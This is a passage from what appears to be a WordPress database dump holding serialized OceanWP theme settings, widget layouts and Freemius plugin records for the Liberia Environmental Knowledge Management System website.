Only!)\";s:24:\"ocean_top_bar_full_width\";b:0;s:20:\"ocean_logo_max_width\";s:3:\"115\";s:23:\"ocean_main_layout_style\";s:8:\"separate\";s:21:\"ocean_theme_button_bg\";s:7:\"#006400\";s:27:\"ocean_theme_button_hover_bg\";s:7:\"#014421\";s:18:\"ocean_header_style\";s:6:\"custom\";s:26:\"ocean_after_header_content\";s:0:\"\";s:23:\"ocean_header_full_width\";b:0;s:12:\"header_image\";s:13:\"remove-header\";s:27:\"ocean_header_image_position\";s:7:\"initial\";s:29:\"ocean_header_image_attachment\";s:7:\"initial\";s:23:\"ocean_header_image_size\";s:5:\"cover\";s:23:\"ocean_menu_links_effect\";s:3:\"two\";s:34:\"ocean_menu_links_effect_blue_color\";s:7:\"#014421\";s:30:\"ocean_dropdown_menu_top_border\";s:7:\"#ffffff\";s:21:\"ocean_menu_arrow_down\";b:1;s:30:\"ocean_menu_dropdown_top_border\";b:1;s:19:\"ocean_menu_position\";s:9:\"left-menu\";s:24:\"ocean_menu_items_padding\";s:2:\"17\";s:17:\"ocean_menu_social\";b:1;s:26:\"ocean_menu_social_profiles\";a:4:{s:7:\"twitter\";s:31:\"https://twitter.com/EkmsLiberia\";s:8:\"facebook\";s:35:\"https://www.facebook.com/ekms.lib.7\";s:5:\"email\";s:24:\"contact@ekmsliberia.info\";s:9:\"instagram\";s:38:\"https://www.instagram.com/ekmsliberia/\";}s:19:\"ocean_header_height\";s:2:\"60\";s:30:\"ocean_has_header_border_bottom\";b:1;s:26:\"ocean_menu_link_background\";s:0:\"\";s:21:\"ocean_menu_link_color\";s:7:\"#ffffff\";s:27:\"ocean_menu_link_color_hover\";s:7:\"#ffffff\";s:20:\"ocean_dropdown_width\";s:3:\"180\";s:33:\"ocean_menu_link_active_background\";s:0:\"\";s:35:\"ocean_blog_single_page_header_title\";s:10:\"post-title\";s:21:\"ocean_blog_entry_meta\";a:3:{i:0;s:6:\"author\";i:1;s:4:\"date\";i:2;s:10:\"categories\";}s:23:\"ocean_boxed_dropdshadow\";b:0;s:32:\"ocean_theme_button_border_radius\";s:2:\"10\";s:23:\"ocean_customzer_styling\";s:4:\"head\";s:22:\"ocean_background_color\";s:7:\"#d4efdf\";s:30:\"ocean_theme_button_top_padding\";s:2:\"10\";s:32:\"ocean_theme_button_right_padding\";s:2:\"10\";s:33:\"ocean_theme_button_bottom_padding\";s:2:\"10\";s:31:\"ocean_theme_button_left_padding\";s:2:\"10\";s:19:\"ocean_top_bar_style\";s:3:\"one\";s:15:\"body_typography\";a:4:{s:11:\"font-family\";s:6:\"Roboto\";s:9:\"font-size\";s:2:\"17\";s:5:\"color\";s:16:\"rgba(0,0,0,0.88)\";s:11:\"line-height\";s:3:\"1.5\";}s:19:\"top_menu_typography\";a:4:{s:9:\"font-size\";s:4:\"13px\";s:11:\"line-height\";s:3:\"1.5\";s:11:\"font-family\";s:0:\"\";s:11:\"font-weight\";s:3:\"400\";}s:15:\"menu_typography\";a:3:{s:11:\"font-weight\";s:3:\"600\";s:14:\"text-transform\";s:9:\"uppercase\";s:9:\"font-size\";s:4:\"15px\";}s:23:\"ocean_menu_search_style\";s:14:\"header_replace\";s:28:\"ocean_menu_link_color_active\";s:7:\"#ffffff\";s:24:\"menu_dropdown_typography\";a:3:{s:9:\"font-size\";s:4:\"15px\";s:11:\"font-weight\";s:3:\"400\";s:14:\"letter-spacing\";i:0;}s:29:\"ocean_page_header_top_padding\";i:0;s:32:\"ocean_page_header_bottom_padding\";i:0;s:23:\"ocean_page_header_style\";s:0:\"\";s:37:\"ocean_page_header_bg_image_attachment\";s:7:\"initial\";s:35:\"ocean_page_header_bg_image_position\";s:13:\"center center\";s:31:\"ocean_page_header_bg_image_size\";s:7:\"initial\";s:46:\"ocean_page_header_bg_title_breadcrumb_position\";s:6:\"center\";s:26:\"ocean_page_header_bg_image\";s:62:\"https://ekmsliberia.info/wp-content/uploads/2019/11/home_4.jpg\";s:33:\"ocean_page_header_bg_image_height\";s:3:\"332\";s:42:\"ocean_page_header_bg_image_overlay_opacity\";s:3:\"0.5\";s:17:\"ocean_breadcrumbs\";b:1;s:27:\"ocean_breadcrumb_show_title\";b:1;s:31:\"ocean_breadcrumb_posts_taxonomy\";s:8:\"category\";s:21:\"page_title_typography\";a:3:{s:14:\"text-transform\";s:9:\"uppercase\";s:9:\"font-size\";s:4:\"30px\";s:11:\"font-weight\";s:3:\"700\";}s:26:\"page_subheading_typography\";a:2:{s:11:\"font-weight\";s:3:\"600\";s:9:\"font-size\";s:4:\"18px\";}s:20:\"copyright_typography\";a:1:{s:9:\"font-size\";s:4:\"12px\";}s:39:\"ocean_medium_header_top_header_elements\";a:2:{i:0;s:4:\"logo\";i:1;s:6:\"social\";}s:33:\"ocean_medium_header_menu_position\";s:9:\"left-menu\";s:31:\"ocean_medium_header_transparent\";b:0;s:30:\"ocean_medium_header_stick_menu\";b:1;s:27:\"ocean_medium_header_menu_bg\";s:7:\"#006400\";s:33:\"ocean_dropdown_menu_link_hover_bg\";s:7:\"#006400\";s:30:\"ocean_dropdown_menu_link_color\";s:7:\"#014421\";s:36:\"ocean_dropdown_menu_link_color_hover\";s:7:\"#ffffff\";s:23:\"ocean_menu_social_style\";s:7:\"colored\";s:20:\"ocean_top_bar_social\";b:1;s:26:\"ocean_main_container_width\";s:4:\"1900\";s:26:\"ocean_left_container_width\";s:2:\"78\";s:27:\"ocean_transparent_header_bg\";s:0:\"\";s:13:\"ocean_top_bar\";b:1;s:30:\"ocean_bottom_footer_background\";s:16:\"rgba(0,0,0,0.98)\";s:25:\"ocean_bottom_footer_color\";s:7:\"#ffffff\";s:36:\"ocean_bottom_footer_link_color_hover\";s:7:\"#014421\";s:27:\"ocean_footer_copyright_text\";s:176:\"© [oceanwp_date] - <a href=\"https://ekmsliberia.info/\">Liberia Environmental Knowledge Management System</a>. All Rights Reserved | <a href=\"#\" target=\"_blank\">Term of Use</a>\";s:31:\"ocean_bottom_footer_top_padding\";s:2:\"20\";s:34:\"ocean_bottom_footer_bottom_padding\";s:2:\"20\";s:35:\"ocean_footer_widgets_tablet_columns\";s:1:\"2\";s:23:\"ocean_footer_background\";s:7:\"#111111\";s:24:\"ocean_footer_top_padding\";s:2:\"50\";s:27:\"ocean_footer_bottom_padding\";s:2:\"50\";s:18:\"ofc_callout_button\";b:1;s:14:\"ofc_callout_bg\";s:7:\"#01aef0\";s:18:\"ofc_callout_border\";s:7:\"#01aef0\";s:17:\"ofc_callout_color\";s:7:\"#ffffff\";s:29:\"ofc_callout_links_color_hover\";s:7:\"#004251\";s:20:\"ofc_callout_template\";s:2:\"22\";s:23:\"ofc_callout_top_padding\";s:2:\"14\";s:26:\"ofc_callout_bottom_padding\";s:2:\"14\";s:21:\"ocean_header_template\";s:2:\"30\";s:33:\"ocean_add_custom_header_container\";b:0;s:34:\"ocean_menu_links_effect_dark_color\";s:7:\"#014421\";s:17:\"ocean_logo_height\";s:2:\"50\";s:23:\"ocean_mobile_menu_style\";s:8:\"dropdown\";s:24:\"ocean_mobile_menu_search\";b:0;s:29:\"ocean_mobile_menu_breakpoints\";s:3:\"767\";s:23:\"ocean_input_top_padding\";s:2:\"10\";s:25:\"ocean_input_right_padding\";s:2:\"15\";s:26:\"ocean_input_bottom_padding\";s:2:\"10\";s:24:\"ocean_input_left_padding\";s:2:\"15\";s:23:\"osp_side_panel_displace\";b:0;s:25:\"osp_side_panel_responsive\";b:0;s:20:\"osp_side_panel_width\";i:400;s:26:\"osp_side_panel_breakpoints\";s:3:\"767\";s:28:\"osp_side_panel_open_btn_icon\";s:10:\"fa fa-bars\";s:32:\"osp_side_panel_custom_breakpoint\";s:0:\"\";s:17:\"osp_side_panel_bg\";s:7:\"#a7d6ab\";s:19:\"osp_close_button_bg\";s:7:\"#006400\";s:25:\"osp_close_button_hover_bg\";s:7:\"#014421\";s:22:\"osp_close_button_color\";s:7:\"#ffffff\";s:14:\"osp_text_color\";s:7:\"#ffffff\";s:15:\"osp_links_color\";s:7:\"#ffffff\";s:21:\"osp_list_border_color\";s:7:\"#ffffff\";s:28:\"osp_close_button_hover_color\";s:7:\"#ffffff\";s:21:\"osp_links_hover_color\";s:7:\"#014421\";s:15:\"osp_top_padding\";s:2:\"30\";s:17:\"osp_right_padding\";s:2:\"60\";s:16:\"osp_left_padding\";s:2:\"60\";s:12:\"osp_template\";s:3:\"324\";s:17:\"osh_sticky_choose\";s:6:\"manual\";s:30:\"osp_side_panel_custom_open_btn\";s:7:\"arrow-r\";s:36:\"osp_side_panel_custom_open_btn_color\";s:7:\"#ffffff\";s:32:\"ocean_mobile_menu_open_hamburger\";s:4:\"spin\";s:38:\"ocean_mobile_menu_open_hamburger_color\";s:7:\"#ffffff\";s:32:\"osp_side_panel_open_btn_position\";s:4:\"menu\";s:11:\"ocn_content\";s:139:\"We use cookies to assist you with navigation and analyze site traffic. If you continue to use this site, you consent to our use of cookies.\";s:9:\"ocn_style\";s:5:\"flyin\";s:10:\"ocn_expiry\";s:8:\"infinity\";s:16:\"ocn_head_scripts\";s:0:\"\";s:10:\"ocn_reload\";s:2:\"no\";s:11:\"ocn_overlay\";s:3:\"yes\";s:14:\"ocn_text_color\";s:7:\"#000000\";s:24:\"ocn_btn_hover_background\";s:7:\"#014421\";s:10:\"ocn_target\";s:6:\"button\";s:15:\"ocn_button_text\";s:13:\"Okay, Got it!\";s:16:\"ofc_callout_text\";s:247:\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\";s:25:\"ofc_callout_button_target\";s:4:\"self\";s:20:\"opl_popup_login_text\";s:5:\"Login\";s:26:\"opl_popup_login_text_title\";s:5:\"Login\";s:24:\"opl_popup_login_position\";s:6:\"manual\";s:25:\"opl_popup_login_logged_in\";s:6:\"logout\";s:26:\"ocean_menu_social_template\";s:1:\"0\";s:27:\"ocean_menu_social_font_size\";i:0;s:27:\"ocean_top_bar_right_padding\";s:1:\"0\";s:26:\"ocean_top_bar_left_padding\";s:2:\"15\";s:30:\"ocean_bottom_footer_link_color\";s:7:\"#006400\";s:22:\"oss_social_share_sites\";a:2:{i:0;s:7:\"twitter\";i:1;s:8:\"facebook\";}s:22:\"oss_social_share_style\";s:7:\"minimal\";s:21:\"oss_social_share_name\";b:0;s:24:\"osh_shrink_header_height\";s:2:\"54\";s:25:\"osh_sticky_header_opacity\";s:3:\"0.5\";s:23:\"osh_sticky_header_style\";s:6:\"shrink\";s:20:\"osh_background_color\";s:0:\"\";s:26:\"ocean_search_post_per_page\";s:0:\"\";s:25:\"ocean_google_font_subsets\";a:1:{i:0;s:5:\"latin\";}s:38:\"ocean_blog_single_elements_positioning\";a:4:{i:0;s:14:\"featured_image\";i:1;s:7:\"content\";i:2;s:12:\"social_share\";i:3;s:4:\"tags\";}s:16:\"ocean_blog_style\";s:15:\"thumbnail-entry\";s:24:\"ocean_top_bar_text_color\";s:7:\"#000000\";s:24:\"ocean_top_bar_link_color\";s:7:\"#59d5f7\";s:30:\"ocean_top_bar_link_color_hover\";s:7:\"#2142ff\";s:35:\"ocean_blog_thumbnail_image_position\";s:5:\"right\";s:31:\"ocean_blog_single_content_width\";s:3:\"700\";s:27:\"ocean_blog_pagination_style\";s:8:\"standard\";s:36:\"ocean_single_post_next_prev_taxonomy\";s:8:\"category\";s:28:\"ocean_blog_related_img_width\";s:1:\"0\";s:38:\"ocean_blog_single_featured_image_title\";b:0;s:43:\"ocean_blog_single_title_bg_image_attachment\";s:5:\"fixed\";s:39:\"ocean_blog_single_title_bg_image_repeat\";s:9:\"no-repeat\";s:41:\"ocean_blog_single_title_bg_image_position\";s:13:\"center center\";s:37:\"ocean_blog_single_title_bg_image_size\";s:5:\"cover\";s:26:\"ocean_sidebar_left_padding\";s:2:\"30\";s:19:\"ocean_sidebar_width\";s:2:\"22\";s:18:\"ocean_footer_color\";s:22:\"rgba(255,255,255,0.87)\";s:29:\"ocean_footer_link_color_hover\";s:7:\"#006400\";s:23:\"ocean_footer_link_color\";s:22:\"rgba(255,255,255,0.88)\";s:48:\"ocean_blog_single_title_bg_image_overlay_opacity\";s:3:\"0.5\";s:30:\"ocean_separate_content_padding\";s:4:\"20px\";s:30:\"ocean_separate_widgets_padding\";s:4:\"20px\";s:25:\"ocean_separate_outside_bg\";s:21:\"rgba(129,215,66,0.14)\";s:22:\"ocean_blog_single_meta\";a:0:{}s:31:\"ocean_single_post_sidebar_order\";s:15:\"content-sidebar\";s:39:\"ocean_blog_single_title_bg_image_height\";s:3:\"400\";s:43:\"ocean_blog_single_title_breadcrumb_position\";s:6:\"center\";s:29:\"ocean_page_header_heading_tag\";s:2:\"h2\";s:19:\"ocean_schema_markup\";b:1;s:21:\"ocean_logo_max_height\";i:0;s:28:\"ocean_page_header_background\";s:7:\"#ffffff\";s:26:\"ocean_breadcrumbs_position\";s:11:\"under-title\";s:30:\"ocean_page_content_top_padding\";i:0;s:33:\"ocean_page_content_bottom_padding\";i:0;s:24:\"ocean_header_top_padding\";s:1:\"0\";s:27:\"ocean_header_bottom_padding\";s:1:\"0\";s:26:\"ocean_header_right_padding\";i:0;s:25:\"ocean_header_left_padding\";i:0;s:31:\"sidebar_widget_title_typography\";a:1:{s:11:\"font-weight\";s:3:\"700\";}s:18:\"widgets_typography\";a:2:{s:9:\"font-size\";s:4:\"13px\";s:11:\"line-height\";s:3:\"1.5\";}s:22:\"breadcrumbs_typography\";a:1:{s:9:\"font-size\";s:4:\"12px\";}s:28:\"opl_popup_login_text_content\";s:20:\"Authority User Login\";s:20:\"opl_popup_logout_url\";s:25:\"https://ekmsliberia.info/\";s:24:\"ocean_blog_related_count\";s:1:\"4\";s:26:\"ocean_blog_related_columns\";s:1:\"4\";s:16:\"ocean_top_bar_bg\";s:7:\"#ffffff\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1629113586;s:4:\"data\";a:37:{s:7:\"ocs-epa\";a:1:{i:0;s:10:\"nav_menu-3\";}s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:0:{}s:9:\"sidebar-2\";a:0:{}s:14:\"search_sidebar\";a:0:{}s:10:\"footer-one\";a:1:{i:0;s:6:\"text-2\";}s:10:\"footer-two\";a:1:{i:0;s:20:\"ocean_recent_posts-2\";}s:12:\"footer-three\";a:1:{i:0;s:10:\"nav_menu-2\";}s:11:\"footer-four\";a:2:{i:0;s:20:\"ocean_contact_info-1\";i:1;s:14:\"ocean_social-2\";}s:15:\"ca-sidebar-2593\";a:1:{i:0;s:13:\"custom_html-3\";}s:15:\"ca-sidebar-2691\";a:2:{i:0;s:14:\"media_image-19\";i:1;s:20:\"ocean_custom_menu-21\";}s:15:\"ca-sidebar-2445\";a:1:{i:0;s:33:\"core_special_widgets_categories-2\";}s:15:\"ca-sidebar-2224\";a:2:{i:0;s:13:\"media_image-5\";i:1;s:19:\"ocean_custom_menu-8\";}s:15:\"ca-sidebar-2678\";a:2:{i:0;s:14:\"media_image-17\";i:1;s:20:\"ocean_custom_menu-18\";}s:15:\"ca-sidebar-2076\";a:2:{i:0;s:13:\"media_image-2\";i:1;s:19:\"ocean_custom_menu-3\";}s:15:\"ca-sidebar-2088\";a:1:{i:0;s:19:\"ocean_custom_menu-4\";}s:15:\"ca-sidebar-2174\";a:2:{i:0;s:13:\"media_image-3\";i:1;s:19:\"ocean_custom_menu-6\";}s:15:\"ca-sidebar-2226\";a:2:{i:0;s:13:\"media_image-6\";i:1;s:20:\"ocean_custom_menu-11\";}s:15:\"ca-sidebar-2450\";a:1:{i:0;s:33:\"core_special_widgets_categories-3\";}s:15:\"ca-sidebar-2664\";a:2:{i:0;s:13:\"media_image-9\";i:1;s:20:\"ocean_custom_menu-20\";}s:15:\"ca-sidebar-2673\";a:2:{i:0;s:14:\"media_image-16\";i:1;s:20:\"ocean_custom_menu-17\";}s:15:\"ca-sidebar-2470\";a:2:{i:0;s:14:\"media_image-12\";i:1;s:20:\"ocean_custom_menu-15\";}s:15:\"ca-sidebar-2280\";a:2:{i:0;s:14:\"media_image-14\";i:1;s:20:\"ocean_custom_menu-13\";}s:15:\"ca-sidebar-2709\";a:2:{i:0;s:14:\"media_image-22\";i:1;s:20:\"ocean_custom_menu-24\";}s:15:\"ca-sidebar-2699\";a:2:{i:0;s:14:\"media_image-21\";i:1;s:20:\"ocean_custom_menu-23\";}s:15:\"ca-sidebar-2670\";a:2:{i:0;s:14:\"media_image-15\";i:1;s:20:\"ocean_custom_menu-16\";}s:15:\"ca-sidebar-2278\";a:2:{i:0;s:14:\"media_image-13\";i:1;s:20:\"ocean_custom_menu-12\";}s:15:\"ca-sidebar-2176\";a:2:{i:0;s:13:\"media_image-4\";i:1;s:19:\"ocean_custom_menu-7\";}s:15:\"ca-sidebar-2681\";a:2:{i:0;s:14:\"media_image-18\";i:1;s:20:\"ocean_custom_menu-19\";}s:15:\"ca-sidebar-2228\";a:2:{i:0;s:13:\"media_image-7\";i:1;s:20:\"ocean_custom_menu-10\";}s:15:\"ca-sidebar-2230\";a:2:{i:0;s:13:\"media_image-8\";i:1;s:19:\"ocean_custom_menu-9\";}s:15:\"ca-sidebar-2694\";a:2:{i:0;s:14:\"media_image-20\";i:1;s:20:\"ocean_custom_menu-22\";}s:15:\"ca-sidebar-2817\";a:1:{i:0;s:5:\"wpp-2\";}s:15:\"ca-sidebar-2779\";a:2:{i:0;s:14:\"media_image-23\";i:1;s:20:\"ocean_custom_menu-25\";}s:15:\"ca-sidebar-2242\";a:1:{i:0;s:11:\"tag_cloud-2\";}s:15:\"ca-sidebar-2091\";a:1:{i:0;s:19:\"ocean_custom_menu-5\";}s:15:\"ca-sidebar-2467\";a:2:{i:0;s:14:\"media_image-11\";i:1;s:20:\"ocean_custom_menu-14\";}}}}','off'),(252,'ocean-extra-version','1.5.18','yes'),(254,'fs_active_plugins','O:8:\"stdClass\":3:{s:7:\"plugins\";a:1:{s:35:\"content-aware-sidebars/lib/freemius\";O:8:\"stdClass\":4:{s:7:\"version\";s:6:\"2.5.12\";s:4:\"type\";s:6:\"plugin\";s:9:\"timestamp\";i:1707094557;s:11:\"plugin_path\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";}}s:7:\"abspath\";s:26:\"/home/ekmslib/public_html/\";s:6:\"newest\";O:8:\"stdClass\":5:{s:11:\"plugin_path\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";s:8:\"sdk_path\";s:35:\"content-aware-sidebars/lib/freemius\";s:7:\"version\";s:6:\"2.5.12\";s:13:\"in_activation\";b:0;s:9:\"timestamp\";i:1707094557;}}','yes'),(255,'fs_debug_mode','','yes'),(256,'fs_accounts','a:20:{s:21:\"id_slug_type_path_map\";a:17:{i:3752;a:3:{s:4:\"slug\";s:7:\"oceanwp\";s:4:\"type\";s:5:\"theme\";s:4:\"path\";s:21:\"oceanwp/functions.php\";}i:3810;a:3:{s:4:\"slug\";s:20:\"ocean-custom-sidebar\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:45:\"ocean-custom-sidebar/ocean-custom-sidebar.php\";}i:3814;a:3:{s:4:\"slug\";s:18:\"ocean-modal-window\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:41:\"ocean-modal-window/ocean-modal-window.php\";}i:3813;a:3:{s:4:\"slug\";s:18:\"ocean-posts-slider\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:41:\"ocean-posts-slider/ocean-posts-slider.php\";}i:3807;a:3:{s:4:\"slug\";s:20:\"ocean-social-sharing\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:45:\"ocean-social-sharing/ocean-social-sharing.php\";}i:3755;a:3:{s:4:\"slug\";s:19:\"ocean-sticky-header\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:43:\"ocean-sticky-header/ocean-sticky-header.php\";}i:3762;a:3:{s:4:\"slug\";s:17:\"ocean-white-label\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:39:\"ocean-white-label/ocean-white-label.php\";}i:3756;a:3:{s:4:\"slug\";s:16:\"ocean-side-panel\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:37:\"ocean-side-panel/ocean-side-panel.php\";}i:3764;a:3:{s:4:\"slug\";s:17:\"ocean-popup-login\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:39:\"ocean-popup-login/ocean-popup-login.php\";}i:3758;a:3:{s:4:\"slug\";s:11:\"ocean-hooks\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:27:\"ocean-hooks/ocean-hooks.php\";}i:3766;a:3:{s:4:\"slug\";s:17:\"ocean-full-screen\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:39:\"ocean-full-screen/ocean-full-screen.php\";}i:3754;a:3:{s:4:\"slug\";s:20:\"ocean-footer-callout\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:45:\"ocean-footer-callout/ocean-footer-callout.php\";}i:3757;a:3:{s:4:\"slug\";s:23:\"ocean-elementor-widgets\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";}i:3765;a:3:{s:4:\"slug\";s:19:\"ocean-cookie-notice\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:43:\"ocean-cookie-notice/ocean-cookie-notice.php\";}i:3797;a:3:{s:4:\"slug\";s:15:\"ocean-pro-demos\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:35:\"ocean-pro-demos/ocean-pro-demos.php\";}i:259;a:3:{s:4:\"slug\";s:22:\"content-aware-sidebars\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";}i:5347;a:3:{s:4:\"slug\";s:4:\"pods\";s:4:\"type\";s:6:\"plugin\";s:4:\"path\";s:13:\"pods/init.php\";}}s:10:\"theme_data\";a:1:{s:7:\"oceanwp\";a:24:{s:16:\"plugin_main_file\";O:8:\"stdClass\":1:{s:4:\"path\";s:21:\"oceanwp/functions.php\";}s:20:\"is_network_activated\";b:0;s:17:\"install_timestamp\";i:1573192298;s:17:\"was_plugin_loaded\";b:1;s:16:\"sdk_last_version\";s:5:\"2.4.1\";s:11:\"sdk_version\";s:5:\"2.4.2\";s:16:\"sdk_upgrade_mode\";b:1;s:18:\"sdk_downgrade_mode\";b:0;s:19:\"plugin_last_version\";s:5:\"1.7.2\";s:14:\"plugin_version\";s:5:\"1.7.3\";s:19:\"plugin_upgrade_mode\";b:1;s:21:\"plugin_downgrade_mode\";b:0;s:17:\"connectivity_test\";a:6:{s:12:\"is_connected\";b:1;s:4:\"host\";s:9:\"localhost\";s:9:\"server_ip\";s:3:\"::1\";s:9:\"is_active\";b:1;s:9:\"timestamp\";i:1573192298;s:7:\"version\";s:5:\"1.7.2\";}s:15:\"prev_is_premium\";b:0;s:18:\"sticky_optin_added\";b:1;s:14:\"has_trial_plan\";b:0;s:22:\"install_sync_timestamp\";i:1629113584;s:19:\"keepalive_timestamp\";i:1629113584;s:20:\"activation_timestamp\";i:1573194369;s:9:\"sync_cron\";O:8:\"stdClass\":5:{s:7:\"version\";s:5:\"1.7.2\";s:7:\"blog_id\";i:0;s:11:\"sdk_version\";s:7:\"2.3.0.4\";s:9:\"timestamp\";i:1573194375;s:2:\"on\";b:1;}s:14:\"sync_timestamp\";i:1629112272;s:15:\"is_whitelabeled\";b:0;s:21:\"is_plugin_new_install\";b:0;s:16:\"uninstall_reason\";O:8:\"stdClass\":3:{s:2:\"id\";s:1:\"4\";s:4:\"info\";s:0:\"\";s:12:\"is_anonymous\";b:0;}}}s:13:\"file_slug_map\";a:17:{s:7:\"oceanwp\";s:7:\"oceanwp\";s:45:\"ocean-custom-sidebar/ocean-custom-sidebar.php\";s:20:\"ocean-custom-sidebar\";s:41:\"ocean-modal-window/ocean-modal-window.php\";s:18:\"ocean-modal-window\";s:41:\"ocean-posts-slider/ocean-posts-slider.php\";s:18:\"ocean-posts-slider\";s:45:\"ocean-social-sharing/ocean-social-sharing.php\";s:20:\"ocean-social-sharing\";s:43:\"ocean-sticky-header/ocean-sticky-header.php\";s:19:\"ocean-sticky-header\";s:39:\"ocean-white-label/ocean-white-label.php\";s:17:\"ocean-white-label\";s:37:\"ocean-side-panel/ocean-side-panel.php\";s:16:\"ocean-side-panel\";s:39:\"ocean-popup-login/ocean-popup-login.php\";s:17:\"ocean-popup-login\";s:27:\"ocean-hooks/ocean-hooks.php\";s:11:\"ocean-hooks\";s:39:\"ocean-full-screen/ocean-full-screen.php\";s:17:\"ocean-full-screen\";s:45:\"ocean-footer-callout/ocean-footer-callout.php\";s:20:\"ocean-footer-callout\";s:51:\"ocean-elementor-widgets/ocean-elementor-widgets.php\";s:23:\"ocean-elementor-widgets\";s:43:\"ocean-cookie-notice/ocean-cookie-notice.php\";s:19:\"ocean-cookie-notice\";s:35:\"ocean-pro-demos/ocean-pro-demos.php\";s:15:\"ocean-pro-demos\";s:49:\"content-aware-sidebars/content-aware-sidebars.php\";s:22:\"content-aware-sidebars\";s:13:\"pods/init.php\";s:4:\"pods\";}s:6:\"themes\";a:1:{s:7:\"oceanwp\";O:9:\"FS_Plugin\":24:{s:16:\"parent_plugin_id\";N;s:5:\"title\";s:7:\"OceanWP\";s:4:\"slug\";s:7:\"oceanwp\";s:12:\"premium_slug\";s:15:\"oceanwp-premium\";s:4:\"type\";s:5:\"theme\";s:20:\"affiliate_moderation\";b:0;s:19:\"is_wp_org_compliant\";b:1;s:22:\"premium_releases_count\";N;s:4:\"file\";s:7:\"oceanwp\";s:7:\"version\";s:5:\"1.7.3\";s:11:\"auto_update\";N;s:4:\"info\";N;s:10:\"is_premium\";b:0;s:14:\"premium_suffix\";s:9:\"(Premium)\";s:7:\"is_live\";b:1;s:9:\"bundle_id\";s:4:\"3767\";s:17:\"bundle_public_key\";s:32:\"pk_c334eb1ae413deac41e30bf00b9dc\";s:17:\"opt_in_moderation\";N;s:10:\"public_key\";s:32:\"pk_043077b34f20f5e11334af3c12493\";s:10:\"secret_key\";N;s:2:\"id\";s:4:\"3752\";s:7:\"updated\";N;s:7:\"created\";N;s:22:\"\0FS_Entity\0_is_updated\";b:0;}}s:9:\"unique_id\";s:32:\"6947e56859242bcc91072b95cce2d473\";s:13:\"admin_notices\";a:15:{s:13:\"oceanwp:theme\";a:0:{}s:16:\"ocean-side-panel\";a:0:{}s:20:\"ocean-footer-callout\";a:0:{}s:17:\"ocean-full-screen\";a:0:{}s:11:\"ocean-hooks\";a:0:{}s:15:\"ocean-pro-demos\";a:0:{}s:20:\"ocean-custom-sidebar\";a:0:{}s:23:\"ocean-elementor-widgets\";a:0:{}s:17:\"ocean-popup-login\";a:0:{}s:19:\"ocean-sticky-header\";a:0:{}s:6:\"global\";a:0:{}s:4:\"pods\";a:0:{}s:19:\"ocean-cookie-notice\";a:0:{}s:17:\"ocean-white-label\";a:0:{}s:22:\"content-aware-sidebars\";a:0:{}}s:11:\"theme_plans\";a:1:{s:7:\"oceanwp\";a:1:{i:0;O:14:\"FS_Plugin_Plan\":21:{s:9:\"plugin_id\";s:8:\"Mzc1Mg==\";s:4:\"name\";s:8:\"ZnJlZQ==\";s:5:\"title\";s:8:\"RnJlZQ==\";s:11:\"description\";N;s:17:\"is_free_localhost\";s:4:\"MQ==\";s:17:\"is_block_features\";s:4:\"MQ==\";s:12:\"license_type\";s:4:\"MA==\";s:16:\"is_https_support\";s:0:\"\";s:12:\"trial_period\";N;s:23:\"is_require_subscription\";s:0:\"\";s:10:\"support_kb\";N;s:13:\"support_forum\";N;s:13:\"support_email\";N;s:13:\"support_phone\";N;s:13:\"support_skype\";N;s:18:\"is_success_manager\";s:0:\"\";s:11:\"is_featured\";s:0:\"\";s:2:\"id\";s:8:\"NjA0MA==\";s:7:\"updated\";N;s:7:\"created\";s:28:\"MjAxOS0wNS0wNiAxMTowODoyNw==\";s:22:\"\0FS_Entity\0_is_updated\";b:0;}}}s:14:\"active_plugins\";O:8:\"stdClass\":3:{s:9:\"timestamp\";i:1615448634;s:3:\"md5\";s:32:\"374f659792791fc36ac044a6036d3cb4\";s:7:\"plugins\";a:31:{s:23:\"elementor/elementor.php\";a:5:{s:4:\"slug\";s:9:\"elementor\";s:7:\"version\";s:5:\"2.7.5\";s:5:\"title\";s:9:\"Elementor\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:21:\"jet-blog/jet-blog.php\";a:5:{s:4:\"slug\";s:8:\"jet-blog\";s:7:\"version\";s:6:\"2.1.22\";s:5:\"title\";s:21:\"JetBlog For Elementor\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:29:\"jet-elements/jet-elements.php\";a:5:{s:4:\"slug\";s:12:\"jet-elements\";s:7:\"version\";s:5:\"2.1.4\";s:5:\"title\";s:25:\"JetElements For Elementor\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:25:\"jet-search/jet-search.php\";a:5:{s:4:\"slug\";s:10:\"jet-search\";s:7:\"version\";s:5:\"2.0.1\";s:5:\"title\";s:23:\"JetSearch For Elementor\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:39:\"jet-smart-filters/jet-smart-filters.php\";a:5:{s:4:\"slug\";s:17:\"jet-smart-filters\";s:7:\"version\";s:5:\"1.5.0\";s:5:\"title\";s:15:\"JetSmartFilters\";s:9:\"is_active\";b:1;s:14:\"is_uninstalled\";b:0;}s:27:\"ocean-extra/ocean-extra.php\";a:5:{s:4:\"slug\";s:11:\"ocean-extra\";s:7:\"version\";s:6:\"1.5.18\";s:5:\"title\";s:11:\"Ocean 